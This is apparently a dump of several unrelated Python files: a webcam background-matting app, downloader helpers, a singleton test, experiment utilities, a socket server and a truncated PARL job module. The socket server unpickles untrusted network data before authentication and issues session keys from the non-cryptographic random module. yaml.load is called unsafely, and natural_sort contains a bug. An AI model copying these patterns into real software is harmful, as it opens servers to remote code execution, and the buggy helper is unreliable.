cycle = [("plain", "Compose: plain white"), ("gaussian", "Compose: blur background"), ("video", "Compose: Winter holidays"), ("image", "Compose: Mt. Rainier")]
current_idx = next(i for i, v in enumerate(cycle) if v[0] == app["compose_mode"])
next_idx = (current_idx + 1) % len(cycle)
app["compose_mode"] = cycle[next_idx][0]
control["label"] = cycle[next_idx][1]
self.render()
def _raw_process_click(self, event, x, y, flags, params):
if event == cv2.EVENT_LBUTTONDOWN:
for control in self.controls:
if x > control["x"] and x < control["x"] + control["w"] and y > control["y"] and y < control["y"] + control["h"]:
self.clicked(control)
class VideoDataset(Dataset):
def __init__(self, path: str, transforms: any = None):
self.cap = cv2.VideoCapture(path)
self.transforms = transforms
self.width = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH))
self.height = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.frame_rate = self.cap.get(cv2.CAP_PROP_FPS)
self.frame_count = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.frame_count
def __getitem__(self, idx):
if isinstance(idx, slice):
return [self[i] for i in range(*idx.indices(len(self)))]
if self.cap.get(cv2.CAP_PROP_POS_FRAMES) != idx:
self.cap.set(cv2.CAP_PROP_POS_FRAMES, idx)
ret, img = self.cap.read()
if not ret:
raise IndexError(f'Idx: {idx} out of length: {len(self)}')
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = Image.fromarray(img)
if self.transforms:
img = self.transforms(img)
return img
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
self.cap.release()
# --------------- Main ---------------
# Load model
model = torch.jit.load(args.model_checkpoint)
model.backbone_scale = args.model_backbone_scale
model.refine_mode = args.model_refine_mode
model.refine_sample_pixels = args.model_refine_sample_pixels
model.model_refine_threshold = args.model_refine_threshold
model.cuda().eval()
width, height = args.resolution
cam = Camera(width=width, height=height)
dsp = Displayer('RTHRBM Preview', cam.width, cam.height, show_info=(not args.hide_fps))
ctr = Controller()
fake_camera = pyfakewebcam.FakeWebcam(args.camera_device, cam.width, cam.height)
dsp.webcam = fake_camera
def cv2_frame_to_cuda(frame):
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
return ToTensor()(Image.fromarray(frame)).unsqueeze_(0).cuda()
preloaded_image = cv2_frame_to_cuda(cv2.imread(args.target_image))
tb_video = VideoDataset(args.target_video, transforms=ToTensor())
def grab_bgr():
bgr_frame = cam.read()
bgr_blur = cv2.GaussianBlur(bgr_frame.astype('float32'), (67, 67), 0).astype('uint8') # cv2.blur(bgr_frame, (10, 10))
app["bgr"] = cv2_frame_to_cuda(bgr_frame)
app["bgr_blur"] = cv2_frame_to_cuda(bgr_blur)
def app_step():
if app["mode"] == "background":
frame = cam.read()
key = dsp.step(frame)
if key == ord('q'):
return True
else:
frame = cam.read()
src = cv2_frame_to_cuda(frame)
pha, fgr = model(src, app["bgr"])[:2]
if app["compose_mode"] == "plain":
tgt_bgr = torch.ones_like(fgr)
elif app["compose_mode"] == "image":
tgt_bgr = nn.functional.interpolate(preloaded_image, (fgr.shape[2:]))
elif app["compose_mode"] == "video":
vidframe = tb_video[app["target_background_frame"]].unsqueeze_(0).cuda()
tgt_bgr = nn.functional.interpolate(vidframe, (fgr.shape[2:]))
app["target_background_frame"] += 1
elif app["compose_mode"] == "gaussian":
tgt_bgr = app["bgr_blur"]
res = pha * fgr + (1 - pha) * tgt_bgr
res = res.mul(255).byte().cpu().permute(0, 2, 3, 1).numpy()[0]
res = cv2.cvtColor(res, cv2.COLOR_RGB2BGR)
key = dsp.step(res)
if key == ord('q'):
return True
with torch.no_grad():
while True:
if app_step():
break
|
utils.py
|
import subprocess, os, os.path, yaml, shlex, re, urllib.parse, shutil, urllib.request, threading
def exe(cmd):
if type(cmd) != type([]):
cmd = shlex.split(cmd)
return subprocess.Popen(cmd)
def exe_pipes(cmd):
if type(cmd) != type([]):
cmd = shlex.split(cmd)
return subprocess.Popen(cmd, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
def exe_flos(cmd, fout, ferr):
if type(cmd) != type([]):
cmd = shlex.split(cmd)
out = open(fout, "w") #io.StringIO()
err = open(ferr, "w") #io.StringIO()
return subprocess.Popen(cmd, stdout = out, stderr = err), out, err
def dw_file_to(url, path, callback):
"""Saves file from url to path
"""
#with urllib.request.urlopen(url) as response, open(path, 'wb') as out_file:
# shutil.copyfileobj(response, out_file)
urllib.request.urlretrieve(url, path, callback)
def set_dir(directory, create=True):
if os.path.isdir(directory):
return directory
else:
if create:
os.makedirs(directory)
return directory
else:
raise Exception("Tried to assign invalid directory: \"%s\"" % directory)
def set_file(f, create=True):
if os.path.isfile(f):
return f
else:
if create:
open(f, 'wb').close()
return f
else:
Exception("Tried to assign invalid file: \"%s\"" % f)
def write_to_file(path, content):
fd = open(path, "w")
fd.write(content)
fd.close()
def get_url_info(url):
"""Retrieves information about given url
"""
settings = load_config()
try:
download_link_getter = exe_pipes(
'plowdown --9kweu ' +
settings["captcha-api-key"] +
' -v1 --skip-final --printf "%%f%%n%%d" %s' % url
)
stdout, stderr = download_link_getter.communicate()
res_list = stdout.decode("utf8").split("\n")
res_err = stderr.decode("utf8")
retc = download_link_getter.returncode
except:
# nasty hack to try to download file directly if plowshare is not installed (TODO: make this better!)
res_list = []
retc = 2
res_err = ''
return url, res_list, res_err, retc
def parse_url_info(url, res_list, res_err, retc):
"""Parses information about given url, returns false on error
"""
if len(res_list) != 3:
if retc == 2 or retc == 0: # -> No available module or something weird (e.g. ftp)
fname = url_to_filename(url)
if len(fname) != 0:
# download file directly
return fname, url
print(
"Error while getting link info: " +
repr(res_err) +
" (" +
str(retc) +
")"
)
return False
else:
return res_list[0], res_list[1]
def load_file(url, path, callback):
"""Downloads url to file.
Returns (False, False) on success, otherwise (True, <x>)
If <x> is True this is considered to be a fatal error, link will be skipped
If <x> is False this link will be retried.
"""
print("Saving '%s' to '%s'" % (url, path))
try:
dw_file_to(url, path, callback)
except Exception as e:
print("Error while downloading: " + str(e))
# check for fatal error
if e.code == 404:
return (None, True)
return (True, False)
else:
return (False, False)
def set_config_path(path):
global config_path
config_path = path
def load_config():
# set_config_path(..) *must* be called by now
if os.path.isfile(config_path):
return yaml.load(open(config_path, "r"))
else:
# return defaults
print('No config file present, creating default one (path: %s)' % config_path)
create_default_config(config_path)
try:
return yaml.load(open(config_path, "r"))
except:
raise Exception('[FATAL] - Could not create config (path: %s)' % config_path)
def create_default_config(path='./config.yaml'):
basic_conf = {
'download-dir': 'downloads',
'captcha-api-key': 'xyz',
'port': 50505,
'parallel-download-num': 1
}
yaml.dump(basic_conf, open(path, 'w'), default_flow_style=False)
def clean_links(raw_data):
return re.findall('(?:ftp|https|http)?://(?:[a-zA-Z]|[0-9]|[$-_@.&+~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', raw_data)
def url_to_filename(url):
res = urllib.parse.urlparse(url)
return os.path.basename(res.path)
def sizeof_fmt(num):
for x in ['bytes','KB','MB','GB']:
if num < 1024.0:
return "%3.1f%s" % (num, x)
num /= 1024.0
return "%3.1f%s" % (num, 'TB')
def start_thread(func, callback=None):
thread = threading.Thread(target=func, kwargs={'on_finish': callback})
thread.daemon = True
thread.start()
def get_user_dir():
return os.path.expanduser('~')
def get_application_dir():
return set_dir(os.path.join(get_user_dir(), '.ploader'))
|
test_singleton.py
|
# -*- coding: utf-8; -*-
from ..syntax import macros, test, test_raises, the # noqa: F401
from ..test.fixtures import session, testset, returns_normally
import pickle
import gc
import threading
from queue import Queue
from ..singleton import Singleton
from ..misc import slurp
from ..it import allsame
# For testing. Defined at the top level to allow pickling.
class Foo(Singleton):
pass
class Bar(Foo):
pass
class Baz(Singleton):
def __init__(self, x=42):
self.x = x
class Qux(Baz):
def __getstate__(self):
return None
# TODO: coverage says this is never actually called. Maybe the data in the
# pickle file knows that `__getstate__` returned `None`, and `loads` skips
# calling `__setstate__`?
def __setstate__(self, state):
return
def runtests():
with testset("basic usage"):
# IMPORTANT: be sure to keep the reference to the object instance the constructor
# gives you. This is the only time you'll see it.
foo = Foo()
test_raises[TypeError, Foo(), "should have errored out, a Foo already exists"]
del foo # deleting the only strong reference kills the Foo instance from the singleton instances
gc.collect() # Need to request garbage collection on PyPy, because otherwise no guarantee when it'll happen.
test[returns_normally(Foo())] # so now it's ok to create a new Foo
# another class that inherits from a singleton class
bar = Bar() # noqa: F841, our strong reference keeps the object alive while testing.
test_raises[TypeError, Bar(), "should have errored out, a Bar already exists"]
with testset("pickling"):
# TODO: FIXME: This module is not the real "__main__" when running under the `macropython` wrapper.
# We HACK this for now so that these pickling tests can run. Not quite sure whether `macropython` even
# should attempt to overwrite `sys.modules["__main__"]` with the "main" module it imports; doing
# that might just break something.
import sys
sys.modules["__main__"].Baz = Baz
sys.modules["__main__"].Qux = Qux
# pickling: basic use
baz = Baz(17)
s = pickle.dumps(baz)
baz2 = pickle.loads(s)
test[the[baz2 is baz]] # it's the same instance
# pickling: by default (if no custom `__getstate__`/`__setstate__`),
# the state of the singleton object is restored (overwritten!) upon
# unpickling it.
baz.x = 23
test[baz.x == 23]
baz2 = pickle.loads(s)
test[the[baz2 is baz]] # again, it's the same instance
test[baz.x == 17] # but unpickling has overwritten the state
# With custom no-op `__getstate__` and `__setstate__`, the existing
# singleton instance's state remains untouched even after unpickling an
# instance of that singleton. This strategy may be useful when defining
# singletons which have no meaningful state to serialize/deserialize.
qux = Qux(17)
s = pickle.dumps(qux)
qux.x = 23
qux2 = pickle.loads(s)
test[the[qux2 is qux]] # it's the same instance
test[qux.x == 23] # and unpickling didn't change the state
with testset("thread safety"):
with test: # just interested that it runs to completion
class Quux(Singleton):
pass
que = Queue()
def worker():
try:
que.put(Quux())
except TypeError:
pass
n = 1000
threads = [threading.Thread(target=worker) for _ in range(n)]
for t in threads:
t.start()
for t in threads:
t.join()
lst = slurp(que)
test[len(lst) == 1]
# TODO: These must be outside the `with test` because a test block
# implicitly creates a function (whence a local scope).
s = pickle.dumps(baz)
del baz
gc.collect()
with test:
que = Queue()
def worker():
try:
que.put(pickle.loads(s)) # let's race!
except TypeError: # pragma: no cover
que.put(None)
n = 1000
threads = [threading.Thread(target=worker) for _ in range(n)]
for t in threads:
t.start()
for t in threads:
t.join()
lst = slurp(que)
test[the[len(lst)] == the[n]]
test[all(x is not None for x in lst)]
test[allsame(lst)]
if __name__ == '__main__': # pragma: no cover
with session(__file__):
runtests()
|
utils.py
|
import importlib.machinery
import logging
import shutil
from multiprocessing import Process, Queue, Pool
import random
import re
import string
def import_by_filename(name, module_path):
"""
Import module by path. Module would appear in sys.modules
:param name: str The name of the module that this loader will handle.
:param module_path: str The path to the source file.
:return:
"""
return importlib.machinery.SourceFileLoader(name, module_path).load_module()
def clean_experiment_folder(folder):
"""Remove subdirectories and files below. Should be used when flexp is setup to clean experiment folder
:param str folder:
"""
import os
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print(e)
def merge_dicts(a, b, path=None, conflict_operation=None):
"""
Merges b into a
:param dict a:
:param dict b:
:param None|list path: Path in dict structure
:param conflict_operation:
:return dict
"""
if path is None:
path = []
for key in b:
if key in a:
if isinstance(a[key], dict) and isinstance(b[key], dict):
merge_dicts(a[key], b[key], path + [str(key)],
conflict_operation)
else:
try:
# same leaf value for numpy
if (a[key] == b[key]).all():
continue
except:
pass
try:
# same leaf value
if a[key] == b[key]:
continue
except:
pass
if not conflict_operation:
raise ValueError(
'Conflict at %s' % '.'.join(path + [str(key)]))
else:
a[key] = conflict_operation(a[key], b[key])
else:
a[key] = b[key]
return a
def natural_sort(seq):
def _alphanum(x):
return [int(x) if x.isdigit() else x.lower()
for c in re.split('([0-9]+)', x)]
return sorted(seq, key=_alphanum)
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
"""
Return random string of size
@param size: int Length of returned string
@param chars: list List of allowed chars
@return: str Random string ex: "AJD45S"
"""
return ''.join(random.choice(chars) for _ in range(size))
# -------------------------------------- Parallelizations, Multiprocessing --------------------------------------------
def parallelwork(fn, inputq, outputq):
"""Run unary `fn` in parallel on data taken from `inputq` and save results to `outputq`.
:param fn: function
:param inputq: multiprocessing.Queue
:param outputq: multiprocessing.Queue
"""
while True:
i, x = inputq.get()
if i is None:
break
try:
outputq.put((i, fn(x)))
except StopIteration:
outputq.put((None, None))
def parallelize(fn, iterator, workers, queuesize_per_worker=None):
"""Parallize function call on items from the iterator.
:param fn: function
:param iterator: iterator
:param workers: int
:param queuesize_per_worker: int
"""
# Try using imap
try:
# start n worker processes
with Pool(processes=workers) as pool:
# Use chunk size if got as parameter
if queuesize_per_worker is not None:
i = pool.imap(fn, iterator, queuesize_per_worker)
else:
i = pool.imap(fn, iterator)
for res in i:
yield res
except:
# todo this probably should be used when pool is not present?
if queuesize_per_worker is not None:
inputq = Queue(queuesize_per_worker * workers)
else:
inputq = Queue()
outputq = Queue()
processes = [Process(target=parallelwork, args=(fn, inputq, outputq))
for worker in range(workers)]
for process in processes:
process.daemon = True
process.start()
sent = [inputq.put((i, x)) for i, x in enumerate(iterator)]
[inputq.put((None, None)) for worker in range(workers)]
for n in range(len(sent)):
i, x = outputq.get()
if i is None:
continue
yield x
[process.join() for process in processes]
def log_method(log_fnc=logging.debug, arguments=True):
"""Decorator to log the method's call with timing.
:param log_fnc: {(str)->None} logging function (e.g. logger.debug or print)
:param arguments: bool - True if you want to include arguments, False if not
:returns: decorator
"""
def wrap(fnc):
def inner(*args, **kwargs):
result = None
log_fnc(u"Method call: {}.{}".format(fnc.__module__, fnc.__name__))
if arguments:
log_fnc(u"Arguments: args: {!s}, kwargs: {!s}".format(args, kwargs))
result = fnc(*args, **kwargs)
log_fnc(u"Method finished: {}.{}".format(fnc.__module__, fnc.__name__))
return result
return inner
return wrap
def get_logger(name):
logger = logging.getLogger(name)
logger.addHandler(logging.NullHandler())
return logger
class PartialFormatter(string.Formatter):
"""
Fills formating fields without provided values with `missing` value.
Code from: https://stackoverflow.com/a/20250018/6579599
"""
def __init__(self, missing='~', bad_fmt='!'):
self.missing, self.bad_fmt = missing, bad_fmt
def get_field(self, field_name, args, kwargs):
# Handle a key not found
try:
val = super(PartialFormatter, self).get_field(field_name, args, kwargs)
# Python 3, 'super().get_field(field_name, args, kwargs)' works
except (KeyError, AttributeError):
val = None, field_name
return val
def format_field(self, value, spec):
# handle an invalid format
if value == None: return self.missing
try:
return super(PartialFormatter, self).format_field(value, spec)
except ValueError:
if self.bad_fmt is not None:
return self.bad_fmt
else:
raise
def exception_safe(fcn, return_on_exception=None):
"""
Function wrapper that handles exception by printing in log
:param function fcn: Function to wrap
:param Any return_on_exception: What should be returned if exception occures
:return Any: If no exception returns the same as `fcn`, otherwise returns `return_on_exception`
"""
def wrapper(*args, **kwargs):
try:
return fcn(*args, **kwargs)
except Exception as e:
logging.warning("Exception in {}: {}".format(fcn.__name__, e))
return return_on_exception
return wrapper
|
socketserverhandler.py
|
import socket as pythonsocket
from threading import Thread
from time import sleep
import datetime
import pickle
import datetime
import database
import reddit
import string
import random
import settings
socket = pythonsocket.socket(pythonsocket.AF_INET, pythonsocket.SOCK_STREAM)
def startServer():
database.beginDataBaseConnection()
database.initDatabase()
server_address = (settings.server_location, int(settings.server_port))
print('Starting server on %s port %s' % server_address)
socket.setsockopt(pythonsocket.SOL_SOCKET, pythonsocket.SO_REUSEADDR, 1)
socket.settimeout(None)
socket.bind(server_address)
socket.listen(5)
socket.settimeout(None)
thread = Thread(target=waitConnect)
thread.start()
servertick = Thread(target=serverTick)
servertick.start()
clients = []
class Client():
def __init__(self, connection, address, authorized):
self.connection = connection
self.address = address
self.authorized = authorized
self.key = None
self.username = None
self.editingScript = None
self.disconnect = False
self.lastPing = datetime.datetime.now()
self.scriptsComplete = []
def waitConnect():
print("Server wait client thread started")
while True:
sleep(0.1)
connection, address = socket.accept()
print("%s Client connected on %s" % (datetime.datetime.now(), address))
client = Client(connection, address, False)
clients.append(client)
clientthread = Thread(target=clientTick, args=[clients[len(clients) - 1]])
clientthread.start()
def getAllClientConnections():
return [client.connection for client in clients]
def sendToAllClients(payload):
for client_con in getAllClientConnections():
try:
sendToClient(client_con, payload)
except Exception:
print("couldn't send to connection %s" % client_con)
def clientTick(client):
print("Server tick thread started for client")
HEADERSIZE = 10
while True:
if client.disconnect:
print("%s SERVER user %s disconnected" % (datetime.datetime.now(), repr(client.username)))
break
full_msg = b''
new_msg = True
while True:
try:
client_connection = client.connection
buf = client_connection.recv(2048)
if new_msg:
try:
msglen = int(buf[:HEADERSIZE])
except ValueError:
print("client disconnect error")
# happens when client disconnects
break
new_msg = False
full_msg += buf
except ConnectionResetError:
print("%s SERVER user %s connecton reset error" % (datetime.datetime.now(), repr(client.username)))
break
download_size = len(full_msg) - HEADERSIZE
if download_size == msglen:
if download_size > 100000:
print(
"%s SERVER received large message (%s)" % (
datetime.datetime.now(), str(download_size / 1000000) + "MB"))
try:
incomingdata = pickle.loads(full_msg[HEADERSIZE:])
except EOFError:
print("%s SERVER user %s disconnected" % (datetime.datetime.now(), repr(client.username)))
break
new_msg = True
full_msg = b""
if not client.authorized:
if "login-attempt" == incomingdata[0]:
print("%s SERVER user %s login attempt" % (datetime.datetime.now(), repr(incomingdata[1])))
username = incomingdata[1]
password = incomingdata[2]
login = (database.login(username, password))
online_users = database.getOnlineUsers()
if username in online_users:
print("%s SERVER user %s already logged in" % (
datetime.datetime.now(), repr(incomingdata[1])))
sendToClient(client_connection, ("login-success", False, None))
else:
if login:
key = generateKey()
client.key = key
client.username = username
sendToClient(client_connection, ("login-success", True, key))
client.authorized = True
print("%s SERVER user %s logged in" % (datetime.datetime.now(), repr(incomingdata[1])))
database.updateUserStatus(username, "ONLINE")
else:
sendToClient(client_connection, ("login-success", False, None))
print("%s SERVER user %s wrong password" % (
datetime.datetime.now(), repr(incomingdata[1])))
else:
if "request-scripts" == incomingdata[1]:
print("%s SERVER user %s request scripts" % (datetime.datetime.now(), repr(client.username)))
if incomingdata[0] == client.key:
print("%s SERVER sending scripts to user %s" % (
datetime.datetime.now(), repr(client.username)))
amount = incomingdata[2]
filter = incomingdata[3]
if filter == "ups":
data = database.getScripts(amount, "ups")
sendToClient(client_connection, ("scripts-return", data))
elif filter == "latest posts":
data = database.getScripts(amount, "timecreated")
sendToClient(client_connection, ("scripts-return", data))
elif filter == "recently added":
data = database.getScripts(amount, "timegathered")
sendToClient(client_connection, ("scripts-return", data))
elif filter == "comments":
data = database.getScripts(amount, "num_comments")
sendToClient(client_connection, ("scripts-return", data))
pass
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "edit-script" == incomingdata[1]:
scriptno = incomingdata[2]
print("%s SERVER user %s request to edit script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
if incomingdata[0] == client.key:
script_status = database.getScriptStatus(scriptno)
if script_status == "RAW":
print("%s SERVER allowing user %s to edit script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
client.editingScript = scriptno
database.updateScriptStatus("EDITING", client.username, scriptno)
sendToClient(client.connection, ('edit-script-success', True, scriptno))
sendToAllClients(('script-status-update', scriptno, "EDITING", client.username))
print("%s SERVER sending all clients (%s) status update for %s" % (
datetime.datetime.now(), len(getAllClientConnections()), scriptno))
elif script_status == "EDITING":
print("%s SERVER refusing user %s to edit script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
sendToClient(client.connection, ('edit-script-success', False, scriptno))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "upload-video" == incomingdata[1]:
if incomingdata[0] == client.key:
scriptno = incomingdata[2]
video_generator_payload = incomingdata[3]
script_status = database.getScriptStatus(scriptno)
if script_status == "EDITING":
if scriptno == client.editingScript:
print("%s SERVER allowing user %s to upload script number %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
if database.uploadVid(video_generator_payload, scriptno):
database.updateScriptStatus("COMPLETE", client.username, scriptno)
sendToClient(client_connection, ('script-upload-success', True, scriptno))
client.scriptsComplete.append(scriptno)
client.editingScript = None
else:
sendToClient(client_connection, ('script-upload-success', False, scriptno))
sendToAllClients(('script-status-update', scriptno, "COMPLETE", client.username))
else:
print(
"%s SERVER user %s script number %s does not match what client is editing %s" % (
datetime.datetime.now(), repr(client.username), scriptno,
client.editingScript))
else:
print("%s SERVER user %s script status is %s" % (
datetime.datetime.now(), repr(client.username), script_status))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "quit-editing" == incomingdata[1]:
if incomingdata[0] == client.key:
scriptno = incomingdata[2]
if client.editingScript == scriptno:
database.updateScriptStatus("RAW", None, scriptno)
print("%s SERVER user %s quit editing %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
sendToAllClients(('script-status-update', scriptno, "RAW", None))
client.editingScript = None
else:
print("%s SERVER user %s not editing script %s" % (
datetime.datetime.now(), repr(client.username), scriptno))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "flag-scripts" == incomingdata[1]:
if incomingdata[0] == client.key:
scriptno = incomingdata[2]
flagtype = incomingdata[3]
database.updateScriptStatus(flagtype, client.username, scriptno)
print("%s SERVER user %s flagging script %s as %s" % (
datetime.datetime.now(), repr(client.username), scriptno, flagtype))
sendToAllClients(('script-status-update', scriptno, flagtype, client.username))
client.editingScript = None
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "add-script" == incomingdata[1]:
if incomingdata[0] == client.key:
url = incomingdata[2]
try:
post = reddit.getPostByUrl(url)
if post is not None:
print("%s SERVER user %s added script %s" % (
datetime.datetime.now(), repr(client.username), post.submission_id))
database.addSubmission(post)
sendToClient(client_connection, ('add-script-success', True, "Successfully added script"))
else:
print("%s SERVER user %s attempted to add script that already exists" % (
datetime.datetime.now(), repr(client.username)))
sendToClient(client_connection,
('add-script-success', False, "Script already in database"))
except Exception as e:
print("%s SERVER user %s error attempting to add script %s" % (
datetime.datetime.now(), repr(client.username), url))
sendToClient(client_connection,
('add-script-success', False, "An error occured trying to add the script"))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
elif "PING" == incomingdata[1]:
if incomingdata[0] == client.key:
client.lastPing = datetime.datetime.now()
print("%s SERVER sending PONG to %s" % (datetime.datetime.now(), repr(client.username)))
sendToClient(client.connection, ('PONG',))
else:
print("%s SERVER user %s key does not match up" % (
datetime.datetime.now(), repr(client.username)))
if (datetime.datetime.now().minute - client.lastPing.minute) > 2:
print("%s SERVER no PING from %s in 2 minutes. Disconnecting" % (
datetime.datetime.now(), repr(client.username)))
client.disconnect = True
print("%s SERVER Thread shutting down" % datetime.datetime.now())
client.disconnect = True
break
def sendToClient(client_connection, payloadattachment):
payload_attach = pickle.dumps(payloadattachment)
HEADERSIZE = 10
payload = bytes(f"{len(payload_attach):<{HEADERSIZE}}", 'utf-8') + payload_attach
client_connection.sendall(payload)
def handleCompletedScripts():
while True:
pass
def serverTick():
global clients
while True:
sleep(0.1)
scriptsbeingedited = database.getScriptEditInformation() # gets information of scripts with EDITING status
sciptsbeingeditedby = [editedby[2] for editedby in scriptsbeingedited] # gets names of scripts with editedby
online_users = database.getOnlineUsers()
clientIndexToRemove = []
if clients:
for i, client in enumerate(clients):
if client.username in sciptsbeingeditedby:
indexOfScript = sciptsbeingeditedby.index(client.username)
scriptno = scriptsbeingedited[indexOfScript][0]
# set script client was editing to raw
if not client.editingScript == scriptno and scriptno not in client.scriptsComplete:
print("%s SERVER setting status of script %s to RAW because client is not editing it" % (
datetime.datetime.now(), scriptno))
database.updateScriptStatus("RAW", None, scriptno)
for client_con in getAllClientConnections():
sendToClient(client_con, ('script-status-update', scriptno, "RAW", None))
if client.disconnect: # if client disconnects set script to raw
clientIndexToRemove.append(i)
else:
if scriptsbeingedited:
for script in scriptsbeingedited:
database.updateScriptStatus("RAW", None, script[0])
for client_con in getAllClientConnections():
sendToClient(client_con, ('script-status-update', scriptno, "RAW", None))
print("%s SERVER setting status of all scrips to RAW as there are no clients." % (
datetime.datetime.now()))
if online_users:
for user in online_users:
database.updateUserStatus(user, None)
print("%s SERVER removing online status for %s as there are no clients" % (
datetime.datetime.now(), user))
if clientIndexToRemove:
for index in clientIndexToRemove:
print("deleted clients")
try:
if clients[index].username is not None:
database.updateUserStatus(clients[index].username, None)
for client in clients:
if not client.disconnect:
sendToClient(client.connection,
('script-status-update', clients[index].editingScript, "RAW", None))
except IndexError:
pass
try:
new_clients = []
for i in range(len(clients)):
if not clients[index] == clients[i]:
new_clients.append(clients[i])
clients = new_clients
except IndexError:
print("could not update client list")
if scriptsbeingedited:
pass
def generateKey():
"""Generate a random string of letters, digits and special characters """
password_characters = string.ascii_letters + string.digits + string.punctuation
return ''.join(random.choice(password_characters) for i in range(10))
|
job.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Fix cloudpickle compatible problem we known.
import compatible_trick
import os
os.environ['CUDA_VISIBLE_DEVICES'] = ''
os.environ['XPARL'] = 'True'
import argparse
import cloudpickle
import pickle
import psutil
import re
import sys
import tempfile
import threading
import time
import traceback
import zmq
from multiprocessing import Process, Pipe
from parl.utils import to_str, to_byte, get_ip_address, logger
from parl.utils.communication import loads_argument, loads_return,\
dumps_argument, dumps_return
from parl.remote import remote_constants
from parl.utils.exceptions import SerializeError, DeserializeError
from parl.remote.message import InitializedJob
from parl.remote.utils import load_remote_class, redirect_stdout_to_file
class Job(object):
"""Base class for the job.
After establishing connection with the remote object, the job will
create a remote class instance locally and enter an infinite loop
in a separate process, waiting for commands from the remote object.
"""
def __init__(self, worker_address, log_server_address):
"""
Args:
worker_address(str): worker_address for sending job information(e.g, pid)
Attributes:
pid (int): Job process ID.
max_memory (float): Maximum memory (MB) can be used by each remote instance.
"""
self.max_memory = None
self.job_address_receiver, job_address_sender = Pipe()
self.job_id_receiver, job_id_sender = Pipe()
self.worker_address = worker_address
self.log_server_address = log_server_address
self.job_ip = get_ip_address()
self.pid = os.getpid()
self.run_job_process = Process(
target=self.run, args=(job_address_sender, job_id_sender))
self.run_job_process.start()
"""
NOTE:
In Windows, it will raise errors when creating threading.Lock before starting multiprocess.Process.
"""
self.lock = threading.Lock()
self._create_sockets()
process = psutil.Process(self.pid)
self.init_memory = float(process.memory_info()[0]) / (1024**2)
self.run_job_process.join()
with self.lock:
self.kill_job_socket.send_multipart(
[remote_constants.KILLJOB_TAG,
to_byte(self.job_address)])
try:
_ = self.kill_job_socket.recv_multipart()
except zmq.error.Again as e:
pass
os._exit(0)
def _create_sockets(self):
"""Create five sockets for each job in main process.
(1) job_socket(functional socket): sends job_address and heartbeat_address to worker.
(2) ping_heartbeat_socket: replies ping message of client.
(3) worker_heartbeat_socket: replies heartbeat message of worker.
(4) client_heartbeat_socket: replies heartbeat message of client.
(5) kill_job_socket: sends a command to the corresponding worker to kill the job.
"""
# wait for another process to create reply socket
self.job_address = self.job_address_receiver.recv()
self.job_id = self.job_id_receiver.recv()
self.ctx = zmq.Context()
# create the job_socket
self.job_socket = self.ctx.socket(zmq.REQ)
self.job_socket.connect("tcp://{}".format(self.worker_address))
# a thread that reply ping signals from the client
ping_heartbeat_socket, ping_heartbeat_address = self._create_heartbeat_server(
timeout=False)
ping_thread = threading.Thread(
target=self._reply_ping, args=(ping_heartbeat_socket, ))
ping_thread.setDaemon(True)
ping_thread.start()
# a thread that reply heartbeat signals from the worker
worker_heartbeat_socket, worker_heartbeat_address = self._create_heartbeat_server(
)
worker_thread = threading.Thread(
target=self._reply_worker_heartbeat,
args=(worker_heartbeat_socket, ))
worker_thread.setDaemon(True)
# a thread that reply heartbeat signals from the client
client_heartbeat_socket, client_heartbeat_address = self._create_heartbeat_server(
)
self.client_thread = threading.Thread(
target=self._reply_client_heartbeat,
args=(client_heartbeat_socket, ))
self.client_thread.setDaemon(True)
# sends job information to the worker
initialized_job = InitializedJob(
self.job_address, worker_heartbeat_address,
client_heartbeat_address, ping_heartbeat_address, None, self.pid,
self.job_id, self.log_server_address)
self.job_socket.send_multipart(
[remote_constants.NORMAL_TAG,
cloudpickle.dumps(initialized_job)])
message = self.job_socket.recv_multipart()
worker_thread.start()
tag = message[0]
assert tag == remote_constants.NORMAL_TAG
# create the kill_job_socket
kill_job_address = to_str(message[1])
self.kill_job_socket = self.ctx.socket(zmq.REQ)
self.kill_job_socket.setsockopt(
zmq.RCVTIMEO, remote_constants.HEARTBEAT_TIMEOUT_S * 1000)
self.kill_job_socket.connect("tcp://{}".format(kill_job_address))
def _check_used_memory(self):
"""Check if the memory used by this job exceeds self.max_memory."""
stop_job = False
if self.max_memory is not None:
process = psutil.Process(self.pid)
used_memory = float(process.memory_info()[0]) / (1024**2)
if used_memory > self.max_memory + self.init_memory:
stop_job = True
return stop_job
def _reply_ping(self, socket):
"""Create a socket server that reply the ping signal from client.
This signal is used to make sure that the job is still alive.
"""
message = socket.recv_multipart()
max_memory = to_str(message[1])
if max_memory != 'None':
self.max_memory = float(max_memory)
socket.send_multipart([remote_constants.HEARTBEAT_TAG])
self.client_thread.start()
socket.close(0)
def _create_heartbeat_server(self, timeout=True):
